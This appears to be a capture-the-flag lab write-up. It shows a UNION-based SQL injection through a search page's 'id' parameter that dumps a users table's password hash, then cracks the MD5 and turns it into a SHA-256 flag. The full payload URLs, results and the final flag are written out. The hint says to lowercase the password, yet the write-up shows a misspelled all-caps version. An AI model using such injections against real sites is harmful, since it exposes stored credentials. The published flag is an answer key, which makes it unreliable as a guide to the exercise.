1 OR 1=1 UNION select Commentaire, user_id FROM Member_Sql_Injection.users

column user_id,  first_name, last_name, Commentaire, town, country, planet, countersign


http://10.11.200.169/?page=searchimg&id=1+OR+1%3D1+UNION+select+Commentaire%2C+user_id+FROM+Member_Sql_Injection.users&Submit=Submit#


Result: 
ID: 1 OR 1=1 UNION select Commentaire, user_id FROM Member_Sql_Injection.users
Title: 5
Url : Decrypt this password -> then lower all the char. Sh256 on it and it's good !

http://10.11.200.169/?page=searchimg&id=1+OR+1%3D1+UNION+select+Commentaire%2C+countersign+FROM+Member_Sql_Injection.users&Submit=Submit#


Result:
ID: 1 OR 1=1 UNION select Commentaire, countersign FROM Member_Sql_Injection.users
Title: 5ff9d0165b4f92b14994e5c685cdce28
Url : Decrypt this password -> then lower all the char. Sh256 on it and it's good !


5ff9d0165b4f92b14994e5c685cdce28 → md5 decrypt  →  FortyTwo  →  FORTWO → SH256 encrypt → d61de82b52419f6a33ba29bf5a6d3ccb4f9e68c85340f970df991a2712280655
